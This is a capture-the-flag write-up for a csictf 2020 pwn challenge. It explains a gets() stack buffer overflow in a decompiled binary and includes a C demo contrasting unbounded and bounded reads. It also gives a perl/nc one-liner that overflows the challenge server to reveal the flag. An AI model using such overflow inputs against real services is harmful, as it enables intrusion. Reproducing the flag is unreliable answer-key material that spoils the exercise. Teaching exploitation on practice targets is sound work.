Tags: bof pwn 

Description

I really want to have some coffee!

nc chall.csivit.com 30001

Analysis

Decompile with Ghidra. main() is very simple:

undefined8 main(void)
{
  char local_38 [44];
  int local_c;
  
  local_c = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Please pour me some coffee:");
  gets(local_38);
  puts("\nThanks!\n");
  if (local_c != 0) {
    puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
    system("cat flag.txt");
  }
  return 0;
}

This is the "hello world" of buffer overflows. It accepts input via gets(), which performs no bounds check, into local_38, a buffer that holds 44 chars; immediately after that on the stack is local_c, which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input: the 45th byte spills into local_c.
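As an added illustration (not part of the original writeup or the challenge binary), the same frame modelled in C with the gets()-style read beside the bounded fgets()-style read that would close the hole. The struct layout, the pour_*/spill function names and the all-'A' payload helper are assumptions made for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Model of the frame Ghidra shows: a 44-byte buffer immediately followed
 * by the int that gates the flag.  A real compiler may lay locals out
 * differently; the struct pins the layout so the demo is deterministic
 * (an assumption of this example, not a fact about the binary). */
struct coffee_frame {
    char local_38[44];
    int  local_c;
};

/* gets()-style read: the whole line is copied with no bound.  Modelled as
 * a byte copy over the frame, capped at the frame size only so that the
 * demo itself stays well-defined C. */
static int pour_unbounded(struct coffee_frame *f, const char *line, size_t n)
{
    memset(f, 0, sizeof *f);
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy(f, line, n);                /* byte 45 lands in local_c */
    return f->local_c != 0;            /* 1 == the "cat flag.txt" branch */
}

/* Hardened read, the fgets(buf, sizeof buf, stdin) shape: at most 43 chars
 * are stored plus a NUL, so local_c is never written. */
static int pour_bounded(struct coffee_frame *f, const char *line)
{
    memset(f, 0, sizeof *f);
    snprintf(f->local_38, sizeof f->local_38, "%s", line);
    return f->local_c != 0;
}

/* Feed n bytes of 'A' through either reader; returns 1 if local_c flipped. */
int spill(size_t n, int bounded)
{
    struct coffee_frame f;
    char payload[256];                 /* constructed input, not user data */
    if (n >= sizeof payload)
        n = sizeof payload - 1;
    memset(payload, 'A', n);
    payload[n] = '\0';
    return bounded ? pour_bounded(&f, payload) : pour_unbounded(&f, payload, n);
}

int main(void)
{
    printf("gets-style,  44 x A: flag=%d\n", spill(44, 0));
    printf("gets-style,  45 x A: flag=%d\n", spill(45, 0));
    printf("fgets-style, 45 x A: flag=%d\n", spill(45, 1));
    return 0;
}
```

With 44 bytes the NUL terminator is what lands in local_c, so it stays zero; the 45th byte is the first one that changes the outcome, and the bounded reader never reaches it regardless of input length.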

Solution

kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:

Thanks!

Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
Original writeup (https://github.com/dobsonj/ctf/tree/master/writeups/2020/csictf/pwn_intended#pwn-intended-0x1).